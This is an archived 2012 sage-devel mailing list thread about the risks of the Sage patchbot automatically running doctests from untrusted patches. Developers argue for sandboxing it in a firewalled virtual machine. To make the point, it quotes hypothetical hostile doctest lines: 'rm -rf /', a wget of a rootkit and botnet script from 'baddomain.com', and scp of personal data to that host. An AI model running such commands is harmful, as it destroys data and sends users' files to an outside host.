On Wed, Feb 15, 2012 at 11:19 AM, William Stein <wst...@gmail.com> wrote:
> On Wed, Feb 15, 2012 at 11:10 AM, Jason Grout
> <jason-s...@creativetrax.com> wrote:
>> On 2/15/12 12:59 PM, William Stein wrote:
>>>
>>> On Wed, Feb 15, 2012 at 10:31 AM, kcrisman<kcris...@gmail.com> wrote:
>>>>>>
>>>>>> expected behavior.
>>>>>
>>>>>
>>>>> It does always timeout. The regular doctests take 1300 seconds for
>>>>> sandpile.py! I need to figure out what's going on there.
>>>>>
>>>>>> I think at this point manual intervention is required. Or was there
>>>>>> something else you were thinking it should do (because clearly you
>>>>>> were surprised, which isn't the intent).
>>>>>
>>>>>
>>>>> Well, I wasn't *too* surprised. I guess I was hoping for everything to
>>>>> work perfectly with no intervention. But it does seem to be working now,
>>>>> with a longer timeout.
>>>>>
>>>>
>>>> Some followup (#10702 notwithstanding):
>>>>
>>>> So I tried out the patchbot. Seemed to work reasonably well at
>>>> first.
>>>>
>>>> Then I came into my office this morning. Computer was humming at a
>>>> VERY decent clip; I could not get the screen to appear, Ctrl-C did
>>>> nothing, nothing nothing nothing, but clearly very busy (testing,
>>>> perhaps). I had to restart it manually.
>>>
>>>
>>> Yikes!
>>>
>>> I'm still worried -- what if some jerk posts a patch to trac that contains
>>>
>>> sage: os.system('rm -rf /')
>>> Got you!
>>>
>>> I think a patch like the above is a very real possibility. All that
>>> would have to happen would be for one of the 500 trac accounts (which
>>> sometimes have very dumb passwords) to be compromised, or for somebody
>>> to get a trac account, and boom -- some users running a patchbot loose
>>> everything. That's not a pretty thought.
>>>
>>
>> or
>>
>> sage: email('SPAM MESSAGE')
>> hahaha
>>
>> or
>>
>> sage: os.system('wget ...') # download rootkit
>> pwned!
>>
>> or
>>
>> sage: os.system("wget http://baddomain.com/joinbotnet.sh";)
>> sage: os.system("scp allyourpersonaldata.tar.gz baddomain.com")
>> sage: os.system("joinbotnet.sh")
>>
>>
>> I would definitely want this thing sandboxed as much as possible, preferably
>> running on a virtual machine that is completely firewalled off from the net,
>> except communication with the patch server.
>
> A virtual machine would be really good because it will normalize
> *what* compute the tests are being run on. It's bad because of the
> same reason, I guess.
>
> But if the point of lots of people running patchbots is that we don't
> have enough compute power on sage.math to do it, then using a
> virtualmachine seems like by far the best option. If it is to test on
> a wide variety of OS/hardware combinations, then it is a bad option.
It turns out that sage.math does have enough compute power to keep up,
though not always with low latency, and being able to test against
different versions is useful to. But the main point is to test a wide
variety of OS/hardware combinations.
- Robert
--
To post to this group, send an email to sage-devel@googlegroups.com
To unsubscribe from this group, send an email to
sage-devel+unsubscr...@googlegroups.com
For more options, visit this group at http://groups.google.com/group/sage-devel
URL: http://www.sagemath.org
